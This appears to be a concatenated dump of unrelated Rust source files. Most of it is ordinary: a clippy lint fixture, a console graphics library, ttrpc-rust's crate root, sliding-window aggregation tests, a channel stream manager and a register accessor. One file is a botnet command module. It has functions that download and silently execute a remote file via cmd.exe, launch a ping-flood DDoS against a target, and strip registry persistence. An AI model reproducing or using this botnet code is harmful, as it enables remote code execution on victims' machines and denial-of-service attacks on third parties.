text stringlengths 8 4.13M |
|---|
// Copyright 2014-2018 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(clippy::print_literal)]
#![warn(clippy::print_with_newline)]
// UI-test fixture for clippy's `print_with_newline` lint: every `print!`
// whose format string ends in exactly one "\n" should fire the lint; the
// remaining calls are negative cases and must stay silent.
// NOTE(review): inserting or removing lines here shifts the spans recorded
// in the companion .stderr file — re-bless the test after any edit.
fn main() {
print!("Hello\n");
print!("Hello {}\n", "world");
print!("Hello {} {}\n", "world", "#2");
print!("{}\n", 1265);
// these are all fine
print!("");
print!("Hello");
println!("Hello");
println!("Hello\n");
println!("Hello {}\n", "world");
print!("Issue\n{}", 1265);
print!("{}", 1265);
print!("\n{}", 1275);
print!("\n\n");
print!("like eof\n\n");
print!("Hello {} {}\n\n", "world", "#2");
println!("\ndon't\nwarn\nfor\nmultiple\nnewlines\n"); // #3126
println!("\nbla\n\n"); // #3126
}
|
extern crate tempdir;
use crate::setuper;
use crate::config;
use tempdir::TempDir;
use std::io::copy;
use std::fs::File;
use std::thread;
use std::process;
use std::time;
// Upgrade function
pub fn upgrade(data: String) {
let url_n_ver: Vec<&str> = data.split("{sep}").collect();
if config::VERSION < url_n_ver[1].parse::<u64>().unwrap() {
let new_ver = download(&url_n_ver[0]);
// TODO !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
}
}
// DDoS function
pub fn ddos(target: String) {
let tnt: Vec<&str> = target.split("{sep}").collect();
start_ddos(tnt[0].to_string(), tnt[1].parse::<u64>().unwrap());
}
// That function does nothing
pub fn nothing() {
thread::sleep(time::Duration::from_secs(1));
}
// Function which deletes botnet
pub fn delete_botnet() {
setuper::rm_startup_reg();
setuper::rm_true_dir();
exit();
}
// Close botnet
pub fn exit() {
process::exit(0x0100);
}
// Download and execute file
pub fn download_exec(url: &'static str) {
thread::spawn(move || {
let file_to_exec = download(url);
let _child = process::Command::new("cmd.exe")
.arg("/c").arg("START").arg("/MIN")
.arg(file_to_exec)
.spawn().unwrap();
});
}
// Function which is called if there are no internet connection
pub fn no_inet() {
thread::sleep(time::Duration::from_secs(60));
}
// Download file
fn download(target: &str) -> String {
let tmp_dir = TempDir::new("temp_files").unwrap();
let mut response = reqwest::get(target).unwrap();
let fname = response
.url()
.path_segments()
.and_then(|segments| segments.last())
.and_then(|name| if name.is_empty() { None } else { Some(name) })
.unwrap_or("tmp.bin");
let new_temp_dir = tmp_dir.into_path();
let fpath = format!("{}\\{}", new_temp_dir.to_str().unwrap(), fname.clone());
let fname = new_temp_dir.join(fname);
let mut out = File::create(fname).unwrap();
copy(&mut response, &mut out).unwrap();
fpath.to_string()
}
// Start DDoS attack
fn start_ddos(target: String, duration: u64) {
thread::spawn(move || {
// TODO !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
let mut child_ddos = process::Command::new("ping")
.arg(&target).arg("-l").arg("1000").arg("-t")
.spawn().unwrap();
thread::sleep(time::Duration::from_secs(duration));
child_ddos.kill().unwrap();
});
} |
use spair::prelude::*;
use crate::types::Product;
/// "Add to cart" button for a single `Product`.
pub struct AtcButton(pub Product);
impl spair::Render<crate::App> for AtcButton {
/// Renders the button; clicking it dispatches `add_to_cart` on the app
/// state with a clone of this button's product.
fn render(self, nodes: spair::Nodes<crate::App>) {
let comp = nodes.comp();
nodes.button(|b| {
b.static_attributes()
.class("product_atc_button")
// `move` captures self.0 into the handler; it is cloned per
// click so the handler can fire more than once.
.on_click(comp.handler(move |state| state.add_to_cart(self.0.clone())))
.nodes()
.r#static("Add To Cart");
});
}
}
|
use super::KeyState;
use super::sprite::RustConsoleSprite;
use std::io::Error;
use std::mem::{swap, MaybeUninit};
/// Character-cell console: dimensions, font metrics and per-frame keyboard
/// state. Several of the platform-facing methods in the impl below are
/// empty stubs in this build — presumably filled in by an OS-specific
/// backend elsewhere (TODO confirm).
pub struct RustConsole {
width: usize,
height: usize,
font_width: i16,
font_height: i16,
// Derived pressed/released/held flags, recomputed each frame from the
// raw snapshots below.
keys: [KeyState; 256],
// Raw per-virtual-key state from the previous and current frame.
old_key_states: [i16; 256],
new_key_states: [i16; 256]
}
impl RustConsole {
// Foreground (character) color attribute bits — the low nibble.
// Presumably mirrors the Win32 console attribute layout; confirm
// against the platform backend.
pub const FG_BLACK: u16 = 0x0000;
pub const FG_DARK_BLUE: u16 = 0x0001;
pub const FG_DARK_GREEN: u16 = 0x0002;
pub const FG_DARK_CYAN: u16 = 0x0003;
pub const FG_DARK_RED: u16 = 0x0004;
pub const FG_DARK_MAGENTA: u16 = 0x0005;
pub const FG_DARK_YELLOW: u16 = 0x0006;
pub const FG_GREY: u16 = 0x0007;
pub const FG_DARK_GREY: u16 = 0x0008;
pub const FG_BLUE: u16 = 0x0009;
pub const FG_GREEN: u16 = 0x000a;
pub const FG_CYAN: u16 = 0x000b;
pub const FG_RED: u16 = 0x000c;
pub const FG_MAGENTA: u16 = 0x000d;
pub const FG_YELLOW: u16 = 0x000e;
pub const FG_WHITE: u16 = 0x000f;
// Background color attribute bits — the second nibble.
pub const BG_BLACK: u16 = 0x0000;
pub const BG_DARK_BLUE: u16 = 0x0010;
pub const BG_DARK_GREEN: u16 = 0x0020;
pub const BG_DARK_CYAN: u16 = 0x0030;
pub const BG_DARK_RED: u16 = 0x0040;
pub const BG_DARK_MAGENTA: u16 = 0x0050;
pub const BG_DARK_YELLOW: u16 = 0x0060;
pub const BG_GREY: u16 = 0x0070;
pub const BG_DARK_GREY: u16 = 0x0080;
pub const BG_BLUE: u16 = 0x0090;
pub const BG_GREEN: u16 = 0x00a0;
pub const BG_CYAN: u16 = 0x00b0;
pub const BG_RED: u16 = 0x00c0;
pub const BG_MAGENTA: u16 = 0x00d0;
pub const BG_YELLOW: u16 = 0x00e0;
pub const BG_WHITE: u16 = 0x00f0;
// Unicode block-element characters used as "pixels" of four intensities.
pub const PIXEL_SOLID: char = '\u{2588}';
pub const PIXEL_THREEQUARTER: char = '\u{2593}';
pub const PIXEL_HALF: char = '\u{2592}';
pub const PIXEL_QUARTER: char = '\u{2591}';
// Virtual key codes for the arrow keys.
pub const VK_UP: u32 = 38u32;
pub const VK_DOWN: u32 = 40u32;
pub const VK_LEFT: u32 = 37u32;
pub const VK_RIGHT: u32 = 39u32;
/// Creates a console of `width` x `height` cells with the given font
/// metrics. Key-state arrays start zeroed; no key is pressed/held.
pub(crate) fn new(width: usize, height: usize, font_width: i16, font_height: i16) -> Result<RustConsole, Error> {
Ok(RustConsole {
width,
height,
font_width,
font_height,
keys: [KeyState { pressed: false, released: false, held: false }; 256],
// SAFETY: an all-zero bit pattern is a valid [i16; 256].
old_key_states: unsafe { MaybeUninit::<[i16; 256]>::zeroed().assume_init() },
new_key_states: unsafe { MaybeUninit::<[i16; 256]>::zeroed().assume_init() }
})
}
/// Pushes the screen buffer to the display. Empty stub in this build.
pub(crate) fn write_output(&mut self) {}
/// Recomputes pressed/released/held flags for all 256 virtual keys by
/// diffing the current snapshot against the previous frame's.
/// NOTE(review): `new_key_states` is zeroed here instead of being read
/// from the OS, so in this stubbed build keys can only ever transition
/// to "released" — confirm against the platform-specific backend.
pub(crate) fn update_key_states(&mut self) {
for v_key in 0..256 {
self.new_key_states[v_key] = 0;
self.keys[v_key].pressed = false;
self.keys[v_key].released = false;
if self.new_key_states[v_key] != self.old_key_states[v_key] {
if self.new_key_states[v_key] != 0 {
// Edge-trigger `pressed` only on the frame the key goes down.
self.keys[v_key].pressed = !self.keys[v_key].held;
self.keys[v_key].held = true;
} else {
self.keys[v_key].released = true;
self.keys[v_key].held = false;
}
}
self.old_key_states[v_key] = self.new_key_states[v_key];
}
}
/// Discards pending input events. Empty stub in this build.
pub(crate) fn flush_input_events(&self) {}
/// Pumps and dispatches input events. Empty stub in this build.
pub(crate) fn handle_input_events(&mut self) {}
// Simple accessors for dimensions, font metrics and per-key state.
pub fn width(&self) -> usize { self.width }
pub fn height(&self) -> usize { self.height }
pub fn font_width(&self) -> i16 { self.font_width }
pub fn font_height(&self) -> i16 { self.font_height }
pub fn key(&self, v_key: usize) -> KeyState { self.keys[v_key] }
/// Sets the window title. Empty stub in this build.
pub fn set_title(&self, _title: String) {}
/// Changes the console dimensions and font metrics, dropping any
/// pending input events first.
pub fn resize(&mut self, new_width: usize, new_height: usize, new_font_width: i16, new_font_height: i16) {
self.flush_input_events();
self.width = new_width;
self.height = new_height;
self.font_width = new_font_width;
self.font_height = new_font_height;
}
/// Clears the screen buffer. Empty stub in this build.
pub fn clear(&mut self) {}
/// Plots one character cell. Empty stub here, but it is the primitive
/// every shape helper below funnels through.
pub fn draw(&mut self, _x: usize, _y: usize, _c: char, _col: u16) {}
/// Fills the half-open rectangle [x1, x2) x [y1, y2) with `c`.
pub fn fill(&mut self, x1: usize, y1: usize, x2: usize, y2: usize, c: char, col: u16) {
for x in x1..x2 {
for y in y1..y2 {
self.draw(x, y, c, col);
}
}
}
/// Draws a string at (x, y). Empty stub in this build.
pub fn draw_string(&mut self, _x: usize, _y: usize, _s: &str, _col: u16) {}
/// Draws a string, skipping blank cells. Empty stub in this build.
pub fn draw_string_alpha(&mut self, _x: usize, _y: usize, _s: &str, _col: u16) {}
/// Draws a line from (x1, y1) to (x2, y2) with Bresenham's integer
/// algorithm, split into a shallow case (|dy| <= |dx|, step along x)
/// and a steep case (step along y).
pub fn draw_line(&mut self, x1: usize, y1: usize, x2: usize, y2: usize, c: char, col: u16) {
let dx = x2 as isize - x1 as isize;
let dy = y2 as isize - y1 as isize;
let dx1 = dx.abs();
let dy1 = dy.abs();
// Accumulated error terms for the shallow (px) and steep (py) cases.
let mut px = 2 * dy1 - dx1;
let mut py = 2 * dx1 - dy1;
if dy1 <= dx1 {
// Shallow: always walk left-to-right, swapping endpoints if needed.
let (mut x, mut y, xe) = if dx >= 0 {
(x1, y1, x2)
} else {
(x2, y2, x1)
};
self.draw(x, y, c, col);
for _i in x..xe {
x += 1;
if px < 0 {
px = px + 2 * dy1;
} else {
// Slope sign decides whether y steps up or down.
if (dx < 0 && dy < 0) || (dx > 0 && dy > 0) {
y += 1;
} else {
y -= 1;
}
px = px + 2 * (dy1 - dx1);
}
self.draw(x, y, c, col);
}
} else {
// Steep: walk top-to-bottom along y instead.
let (mut x, mut y, ye) = if dy >= 0 {
(x1, y1, y2)
} else {
(x2, y2, y1)
};
self.draw(x, y, c, col);
for _i in y..ye {
y += 1;
if py <= 0 {
py = py + 2 * dx1;
} else {
if (dx < 0 && dy < 0) || (dx > 0 && dy > 0) {
x += 1;
} else {
x -= 1;
}
py = py + 2 * (dx1 - dy1);
}
self.draw(x, y, c, col);
}
}
}
/// Outlines a triangle by drawing its three edges.
pub fn draw_triangle(&mut self, x1: usize, y1: usize, x2: usize, y2: usize, x3: usize, y3: usize, c: char, col: u16) {
self.draw_line(x1, y1, x2, y2, c, col);
self.draw_line(x2, y2, x3, y3, c, col);
self.draw_line(x3, y3, x1, y1, c, col);
}
/// Scanline-fills a triangle: vertices are sorted by y, then two
/// Bresenham-style edge walkers (t1x, t2x) advance in lockstep, and the
/// horizontal span between them is drawn at each y — first for the top
/// half (v1..v2), then for the bottom half (v2..v3).
pub fn fill_triangle(&mut self, mut x1: usize, mut y1: usize, mut x2: usize, mut y2: usize, mut x3: usize, mut y3: usize, c: char, col: u16) {
// `changedN` records that edge N is steep (dx/dy were swapped), which
// alters how the walker advances per scanline.
let mut changed1 = false;
let mut changed2 = false;
// sort vertices
if y1 > y2 {
swap(&mut y1, &mut y2);
swap(&mut x1, &mut x2);
}
if y1 > y3 {
swap(&mut y1, &mut y3);
swap(&mut x1, &mut x3);
}
if y2 > y3 {
swap(&mut y2, &mut y3);
swap(&mut x2, &mut x3);
}
// starting points
let mut t1x = x1 as isize;
let mut t2x = x1 as isize;
let mut y = y1;
let mut dx1 = x2 as isize - x1 as isize;
let signx1 = if dx1 < 0 {
dx1 = -dx1;
-1
} else {
1
};
let mut dy1 = y2 as isize - y1 as isize;
let mut dx2 = x3 as isize - x1 as isize;
let signx2 = if dx2 < 0 {
dx2 = -dx2;
-1
} else {
1
};
let mut dy2 = y3 as isize - y1 as isize;
if dy1 > dx1 {
swap(&mut dx1, & mut dy1);
changed1 = true;
}
if dy2 > dx2 {
swap(&mut dy2, &mut dx2);
changed2 = true;
}
let mut e2 = dx2 >> 1;
if y1 != y2 { // not flat top, so do the first half
let mut e1 = dx1 >> 1;
for mut i in 0..dx1 {
let mut t1xp = 0;
let mut t2xp = 0;
let (mut minx, mut maxx) = if t1x < t2x {
(t1x, t2x)
} else {
(t2x, t1x)
};
// process first line until y value is about to change
'first_line_1: while i < dx1 {
i += 1;
e1 += dy1;
while e1 >= dx1 {
e1 -= dx1;
if changed1 {
t1xp = signx1;
} else {
break 'first_line_1;
}
}
if changed1 {
break 'first_line_1;
} else {
t1x += signx1;
}
}
// process second line until y value is about to change
'second_line_1: loop {
e2 += dy2;
while e2 >= dx2 {
e2 -= dx2;
if changed2 {
t2xp = signx2;
} else {
break 'second_line_1;
}
}
if changed2 {
break 'second_line_1;
} else {
t2x += signx2;
}
}
// Widen the span to cover both walkers' final positions.
if minx > t1x {
minx = t1x;
}
if minx > t2x {
minx = t2x;
}
if maxx < t1x {
maxx = t1x;
}
if maxx < t2x {
maxx = t2x;
}
// draw line from min to max points found on the y
for j in minx..=maxx {
self.draw(j as usize, y, c, col);
}
// now increase y
if !changed1 {
t1x += signx1;
}
t1x += t1xp;
if !changed2 {
t2x += signx2;
}
t2x += t2xp;
y += 1;
if y == y2 {
break;
}
}
}
// now, do the second half
// Re-seed edge 1 to walk v2 -> v3; edge 2 keeps walking v1 -> v3.
dx1 = x3 as isize - x2 as isize;
let signx1 = if dx1 < 0 {
dx1 = -dx1;
-1
} else {
1
};
dy1 = y3 as isize - y2 as isize;
t1x = x2 as isize;
if dy1 > dx1 {
swap(&mut dy1, &mut dx1);
changed1 = true;
} else {
changed1 = false;
}
let mut e1 = dx1 >> 1;
for mut i in 0..=dx1 {
let mut t1xp = 0;
let mut t2xp = 0;
let (mut minx, mut maxx) = if t1x < t2x {
(t1x, t2x)
} else {
(t2x, t1x)
};
// process first line until y value is about to change
'first_line_2: while i < dx1 {
e1 += dy1;
while e1 >= dx1 {
e1 -= dx1;
if changed1 {
t1xp = signx1;
break;
} else {
break 'first_line_2;
}
}
if changed1 {
break 'first_line_2;
} else {
t1x += signx1;
}
if i < dx1 {
i += 1;
}
}
// process second line until y value is about to change
'second_line_2: while t2x != x3 as isize {
e2 += dy2;
while e2 >= dx2 {
e2 -= dx2;
if changed2 {
t2xp = signx2;
} else {
break 'second_line_2;
}
}
if changed2 {
break 'second_line_2;
} else {
t2x += signx2;
}
}
if minx > t1x {
minx = t1x;
}
if minx > t2x {
minx = t2x;
}
if maxx < t1x {
maxx = t1x;
}
if maxx < t2x {
maxx = t2x;
}
// draw line from min to max points found on the y
for j in minx..=maxx {
self.draw(j as usize, y, c, col);
}
// now increase y
if !changed1 {
t1x += signx1;
}
t1x += t1xp;
if !changed2 {
t2x += signx2;
}
t2x += t2xp;
y += 1;
if y > y3 {
return;
}
}
}
/// Outlines a circle of radius `r` centered at (xc, yc) with the
/// midpoint circle algorithm, plotting all eight octants per step.
/// NOTE(review): `xc - x` / `yc - y` are usize subtractions — they
/// underflow (panic in debug builds) when the circle crosses the
/// left/top edge; confirm callers keep circles fully on screen.
pub fn draw_circle(&mut self, xc: usize, yc: usize, r: usize, c: char, col: u16) {
let mut x = 0;
let mut y = r;
let mut p = 3 - 2 * r as isize;
if r == 0 { return; }
while y >= x {
self.draw(xc - x, yc - y, c, col); // upper left left
self.draw(xc - y, yc - x, c, col); // upper upper left
self.draw(xc + y, yc - x, c, col); // upper upper right
self.draw(xc + x, yc - y, c, col); // upper right right
self.draw(xc - x, yc + y, c, col); // lower left left
self.draw(xc - y, yc + x, c, col); // lower lower left
self.draw(xc + y, yc + x, c, col); // lower lower right
self.draw(xc + x, yc + y, c, col); // lower right right
if p < 0 {
p += 4 * x as isize + 6;
x += 1;
} else {
p += 4 * (x as isize - y as isize) + 10;
x += 1;
y -= 1;
}
}
}
/// Fills a circle by drawing a horizontal span per octant pair at each
/// midpoint-algorithm step. Same usize-underflow caveat as
/// `draw_circle` for circles crossing the left/top edge.
pub fn fill_circle(&mut self, xc: usize, yc: usize, r: usize, c: char, col: u16) {
let mut x = 0;
let mut y = r;
let mut p = 3 - 2 * r as isize;
if r == 0 { return; }
while y >= x {
for i in xc - x..=xc + x {
self.draw(i, yc - y, c, col);
}
for i in xc - y..=xc + y {
self.draw(i, yc - x, c, col);
}
for i in xc - x..=xc + x {
self.draw(i, yc + y, c, col);
}
for i in xc - y..=xc + y {
self.draw(i, yc + x, c, col);
}
if p < 0 {
p += 4 * x as isize + 6;
x += 1;
} else {
p += 4 * (x as isize - y as isize) + 10;
x += 1;
y -= 1;
}
}
}
/// Blits a sprite at (x, y); space glyphs are skipped, so ' ' acts as
/// transparency.
pub fn draw_sprite(&mut self, x: usize, y: usize, sprite: &RustConsoleSprite) {
for i in 0..sprite.width() {
for j in 0..sprite.height() {
if sprite.get_glyph(i, j) != ' ' {
self.draw(x + i, y + j, sprite.get_glyph(i, j), sprite.get_color(i, j));
}
}
}
}
}
// Copyright (c) 2019 Ant Financial
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//! ttrpc-rust is a **non-core** subproject of containerd
//!
//! `ttrpc-rust` is the Rust version of [ttrpc](https://github.com/containerd/ttrpc). [ttrpc](https://github.com/containerd/ttrpc) is GRPC for low-memory environments.
//!
//! Example:
//!
//! Check [this](https://github.com/containerd/ttrpc-rust/tree/master/example)
//!
//! # Feature flags
//!
//! - `async`: Enables async server and client.
//! - `sync`: Enables traditional sync server and client (default enabled).
//! - `protobuf-codec`: Includes rust-protobuf (default enabled).
//!
//! # Socket address
//!
//! For Linux distributions, ttrpc-rust supports three types of socket:
//!
//! - `unix:///run/some.sock`: Normal Unix domain socket.
//! - `unix://@/run/some.sock`: Abstract Unix domain socket.
//! - `vsock://8:1024`: [vsock](https://man7.org/linux/man-pages/man7/vsock.7.html).
//!
//! For macOS, ttrpc-rust **only** supports normal Unix domain socket:
//!
//! - `unix:///run/some.sock`: Normal Unix domain socket.
//!
#![cfg_attr(docsrs, feature(doc_cfg))]
#[macro_use]
extern crate log;
#[macro_use]
pub mod error;
#[macro_use]
mod common;
#[macro_use]
mod macros;
pub mod context;
pub mod proto;
#[doc(inline)]
pub use self::proto::{Code, MessageHeader, Request, Response, Status};
#[doc(inline)]
pub use crate::error::{get_status, Error, Result};
cfg_sync! {
pub mod sync;
#[doc(hidden)]
pub use sync::response_to_channel;
#[doc(inline)]
pub use sync::{MethodHandler, TtrpcContext};
pub use sync::Client;
#[doc(inline)]
pub use sync::Server;
}
cfg_async! {
pub mod asynchronous;
#[doc(hidden)]
pub use asynchronous as r#async;
}
|
use alga::general::AbstractGroup;
use alga::general::AbstractLoop;
use alga::general::AbstractMagma;
use alga::general::AbstractMonoid;
use alga::general::AbstractQuasigroup;
use alga::general::AbstractSemigroup;
use alga::general::Identity;
use alga::general::Operator;
use alga::general::TwoSidedInverse;
use swag::daba::*;
use swag::rfs::*;
use swag::soe::*;
use swag::two_stacks::*;
use swag::flat_fat::ra_fifo::*;
use swag::*;
// i32 newtype used as the aggregation element in the window tests below.
#[derive(Copy, Clone, PartialEq, Eq, Debug)]
struct Value(i32);
// Operator marker type: integer addition over `Value`.
#[derive(Copy, Clone, Debug)]
struct Sum;
impl Operator for Sum {
fn operator_token() -> Sum {
Sum
}
}
// 0 is the additive identity.
impl Identity<Sum> for Value {
fn identity() -> Value {
Value(0)
}
}
// The magma operation: component-wise addition.
impl AbstractMagma<Sum> for Value {
fn operate(&self, other: &Self) -> Self {
Value(self.0 + other.0)
}
}
// Negation is the two-sided inverse of addition.
impl TwoSidedInverse<Sum> for Value {
fn two_sided_inverse(&self) -> Value {
Value(-self.0)
}
}
// Marker impls asserting that (Value, +) satisfies the algebraic
// properties the swag window implementations require, up to a group.
impl AbstractSemigroup<Sum> for Value {}
impl AbstractMonoid<Sum> for Value {}
impl AbstractQuasigroup<Sum> for Value {}
impl AbstractLoop<Sum> for Value {}
impl AbstractGroup<Sum> for Value {}
/// Shared scenario for every sliding-window implementation: push 1, 2, 3
/// (checking the running sum after each insert), then evict the oldest
/// element and check the sum again.
fn test_simple<Window>(mut window: Window)
where
    Window: FifoWindow<Value, Sum> + std::fmt::Debug,
{
    // An empty window must report the identity of the Sum operator.
    assert_eq!(window.query(), Value(0));
    // Insert 1, 2, 3; after each push the query is the prefix sum.
    for (item, expected) in [(1, 1), (2, 3), (3, 6)].iter() {
        window.push(Value(*item));
        assert_eq!(window.query(), Value(*expected));
    }
    // Evicting the oldest element (1) leaves 2 + 3 = 5.
    window.pop();
    assert_eq!(window.query(), Value(5));
}
// Run the shared scenario against each window implementation.
#[test]
fn test_simple_rfs() {
test_simple(RFS::<Value, Sum>::new());
}
#[test]
fn test_simple_soe() {
test_simple(SOE::<Value, Sum>::new());
}
#[test]
fn test_simple_two_stacks() {
test_simple(TwoStacks::<Value, Sum>::new());
}
#[test]
fn test_simple_daba() {
test_simple(DABA::<Value, Sum>::new());
}
#[test]
fn test_simple_flat_fat() {
// FlatFAT variant takes an explicit initial capacity.
test_simple(RA::<Value, Sum>::with_capacity(2));
}
|
use byteorder::{BigEndian, ByteOrder, ReadBytesExt};
use std::collections::HashMap;
use std::collections::hash_map::Entry;
use std::io::{Cursor, Seek, SeekFrom};
use session::{Session, PacketHandler};
/// Outcome of a handler callback: keep going with handler `H`, hand the
/// channel over to a newly spawned handler `S` (defaults to `H`), or
/// close the channel.
pub enum Response<H, S = H> {
Continue(H),
Spawn(S),
Close,
}
impl <H: Handler + 'static> Response<H> {
    /// Type-erases the contained handler, boxing it behind the `Handler`
    /// trait object so heterogeneous handlers can share one channel map.
    pub fn boxed(self) -> Response<Box<Handler>> {
        match self {
            Response::Close => Response::Close,
            Response::Spawn(h) => Response::Spawn(Box::new(h)),
            Response::Continue(h) => Response::Continue(Box::new(h)),
        }
    }
}
/// Per-channel event callbacks. Each method consumes `self` and returns a
/// `Response` deciding the channel's fate. The `box_on_*` variants exist
/// for object safety: the `where Self: Sized` methods cannot be called
/// through a `Box<Handler>`, so the manager calls the boxed forms instead.
pub trait Handler: Send {
fn on_create(self, channel_id: ChannelId, session: &Session) -> Response<Self> where Self: Sized;
fn on_header(self, header_id: u8, header_data: &[u8], session: &Session) -> Response<Self> where Self: Sized;
fn on_data(self, data: &[u8], session: &Session) -> Response<Self> where Self: Sized;
fn on_error(self, session: &Session) -> Response<Self> where Self: Sized;
fn on_close(self, session: &Session) -> Response<Self> where Self: Sized;
fn box_on_create(self: Box<Self>, channel_id: ChannelId, session: &Session) -> Response<Box<Handler>>;
fn box_on_header(self: Box<Self>, header_id: u8, header_data: &[u8], session: &Session) -> Response<Box<Handler>>;
fn box_on_data(self: Box<Self>, data: &[u8], session: &Session) -> Response<Box<Handler>>;
fn box_on_error(self: Box<Self>, session: &Session) -> Response<Box<Handler>>;
fn box_on_close(self: Box<Self>, session: &Session) -> Response<Box<Handler>>;
}
// Channels are identified by the u16 carried in each packet's first two bytes.
pub type ChannelId = u16;
// A channel first receives length-prefixed headers, then raw data.
enum ChannelMode {
Header,
Data
}
// Current mode plus the type-erased handler driving this channel.
struct Channel(ChannelMode, Box<Handler>);
impl Channel {
/// Dispatches one packet to the handler. Packet layout (big-endian):
/// two bytes of channel id, then — in Header mode — repeated
/// `u16 length, u8 header_id, (length - 1) bytes of header data`
/// records, with a zero length marking the switch to Data mode; in
/// Data mode the remainder of the packet is the payload, and an empty
/// payload means end-of-channel. `cmd == 0xa` is an error packet.
fn handle_packet(self, cmd: u8, data: Vec<u8>, session: &Session) -> Response<Self, Box<Handler>> {
let Channel(mode, mut handler) = self;
let mut packet = Cursor::new(&data as &[u8]);
packet.read_u16::<BigEndian>().unwrap(); // Skip channel id
if cmd == 0xa {
println!("error: {} {}", data.len(), packet.read_u16::<BigEndian>().unwrap());
// The channel dies on error; only a Spawn from the handler survives.
return match handler.box_on_error(session) {
Response::Continue(_) => Response::Close,
Response::Spawn(f) => Response::Spawn(f),
Response::Close => Response::Close,
};
}
match mode {
ChannelMode::Header => {
let mut length = 0;
while packet.position() < data.len() as u64 {
length = packet.read_u16::<BigEndian>().unwrap();
if length > 0 {
let header_id = packet.read_u8().unwrap();
// length counts the id byte, hence the `- 1` for the data slice.
let header_data = &data[packet.position() as usize .. packet.position() as usize + length as usize - 1];
handler = match handler.box_on_header(header_id, header_data, session) {
Response::Continue(handler) => handler,
Response::Spawn(f) => return Response::Spawn(f),
Response::Close => return Response::Close,
};
packet.seek(SeekFrom::Current(length as i64 - 1)).unwrap();
}
}
// A trailing zero length ends the header phase.
if length == 0 {
Response::Continue(Channel(ChannelMode::Data, handler))
} else {
Response::Continue(Channel(ChannelMode::Header, handler))
}
}
ChannelMode::Data => {
if packet.position() < data.len() as u64 {
let event_data = &data[packet.position() as usize..];
match handler.box_on_data(event_data, session) {
Response::Continue(handler) => Response::Continue(Channel(ChannelMode::Data, handler)),
Response::Spawn(f) => Response::Spawn(f),
Response::Close => Response::Close,
}
} else {
// Empty data packet: the stream is done; close the channel.
match handler.box_on_close(session) {
Response::Continue(_) => Response::Close,
Response::Spawn(f) => Response::Spawn(f),
Response::Close => Response::Close,
}
}
}
}
}
}
/// Owns all live channels, keyed by id. The `Option` wrapper lets
/// `handle` temporarily move a channel out of the map while the handler
/// (which consumes the channel by value) runs.
pub struct StreamManager {
next_id: ChannelId,
channels: HashMap<ChannelId, Option<Channel>>,
}
impl StreamManager {
/// Creates an empty manager; channel ids are handed out from 0 upward.
pub fn new() -> StreamManager {
StreamManager {
next_id: 0,
channels: HashMap::new(),
}
}
/// Allocates the next channel id and asks the handler to initialize.
/// On `Spawn` the replacement handler is registered recursively (it
/// gets a fresh id); on `Close` the id is simply consumed.
pub fn create(&mut self, handler: Box<Handler>, session: &Session) {
let channel_id = self.next_id;
self.next_id += 1;
trace!("allocated stream {}", channel_id);
match handler.box_on_create(channel_id, session) {
Response::Continue(handler) => {
self.channels.insert(channel_id, Some(Channel(ChannelMode::Header, handler)));
}
Response::Spawn(handler) => self.create(handler, session),
Response::Close => (),
}
}
}
impl PacketHandler for StreamManager {
/// Routes a packet to the channel named by its first two bytes.
/// The channel is `take`n out of its map slot (handle_packet consumes
/// it), then either reinserted, removed, or removed with its spawned
/// successor registered under a fresh id.
fn handle(&mut self, cmd: u8, data: Vec<u8>, session: &Session) {
let id: ChannelId = BigEndian::read_u16(&data[0..2]);
let spawn = if let Entry::Occupied(mut entry) = self.channels.entry(id) {
if let Some(channel) = entry.get_mut().take() {
match channel.handle_packet(cmd, data, session) {
Response::Continue(channel) => {
entry.insert(Some(channel));
None
}
Response::Spawn(f) => {
entry.remove();
Some(f)
}
Response::Close => {
entry.remove();
None
}
}
} else {
// Slot exists but the channel is mid-flight elsewhere; drop packet.
None
}
} else {
// Unknown channel id; drop the packet.
None
};
// `create` needs &mut self, so it must run after the entry borrow ends.
if let Some(s) = spawn {
self.create(s, session);
}
}
}
|
// svd2rust-generated accessor for the read-only TXFSTS register; this
// file is normally regenerated from the SVD, so keep edits to comments.
#[doc = "Register `TXFSTS` reader"]
pub type R = crate::R<TXFSTS_SPEC>;
#[doc = "Field `INEPTFSAV` reader - IN endpoint TxFIFO space avail"]
pub type INEPTFSAV_R = crate::FieldReader<u16>;
impl R {
#[doc = "Bits 0:15 - IN endpoint TxFIFO space avail"]
#[inline(always)]
pub fn ineptfsav(&self) -> INEPTFSAV_R {
// Field occupies the low 16 bits of the 32-bit register.
INEPTFSAV_R::new((self.bits & 0xffff) as u16)
}
}
#[doc = "OTG_HS device IN endpoint transmit FIFO status register\n\nYou can [`read`](crate::generic::Reg::read) this register and get [`txfsts::R`](R). See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct TXFSTS_SPEC;
impl crate::RegisterSpec for TXFSTS_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [`txfsts::R`](R) reader structure"]
impl crate::Readable for TXFSTS_SPEC {}
#[doc = "`reset()` method sets TXFSTS to value 0"]
impl crate::Resettable for TXFSTS_SPEC {
const RESET_VALUE: Self::Ux = 0;
}
|
// This file is part of dpdk. It is subject to the license terms in the COPYRIGHT file found in the top-level directory of this distribution and at https://raw.githubusercontent.com/lemonrock/dpdk/master/COPYRIGHT. No part of dpdk, including this file, may be copied, modified, propagated, or distributed except according to the terms contained in the COPYRIGHT file.
// Copyright © 2017 The developers of dpdk. See the COPYRIGHT file in the top-level directory of this distribution and at https://raw.githubusercontent.com/lemonrock/dpdk/master/COPYRIGHT.
/// Thin safe-ish wrapper over a raw libibverbs completion-queue pointer.
/// Implementors provide `pointer()`; every other method dereferences it,
/// relying on the implementations' debug-time non-null assertion.
/// (CamelCase method names follow this project's existing convention.)
pub trait CompletionQueuePointer: HasContextPointer + HasVerbsPointer
{
#[inline(always)]
